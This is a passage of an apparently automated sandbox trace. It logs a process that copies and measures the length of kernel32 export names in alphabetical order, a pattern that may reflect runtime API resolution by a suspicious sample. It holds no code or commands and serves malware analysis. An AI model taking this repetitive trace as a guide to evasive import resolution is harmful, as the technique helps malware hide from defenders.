lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.344] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.344] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.344] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.344] lstrlenA (lpString="BEEP") returned 4 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.344] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.344] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.344] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.344] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.345] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.345] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.345] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.345] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.345] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.345] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.345] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.345] lstrlenA (lpString="CANCELIO") returned 8 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.345] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.345] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.345] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.345] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.345] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.345] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.345] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.345] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.345] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.345] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.345] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.346] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.346] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.346] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.346] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.346] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.346] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.346] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.346] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.346] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.346] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.346] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.346] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.346] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.346] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.346] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.346] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.346] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.346] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.347] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.347] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.347] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.347] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.347] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.347] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.347] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.347] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.347] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.347] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.347] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.347] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.347] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.347] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.347] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.347] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.347] lstrlenA (lpString="COPYFILEA") returned 9 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.347] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.348] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.348] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.348] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.348] lstrlenA (lpString="COPYFILEW") returned 9 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.348] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.348] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.348] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.348] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.348] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.348] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.348] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.348] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.348] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.348] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.348] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.348] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.348] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.348] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.349] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.349] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.349] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.349] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.349] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.349] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.349] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.349] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.349] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.349] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.349] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.349] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.349] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.349] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.349] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.349] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.349] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.349] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.350] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.350] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.350] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.350] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.350] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.350] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.350] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.350] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.350] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.350] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.350] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.350] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.350] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.350] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.350] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.350] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.350] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.350] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.351] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.351] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.351] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.351] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.351] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.351] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.351] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.351] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.351] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.351] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: 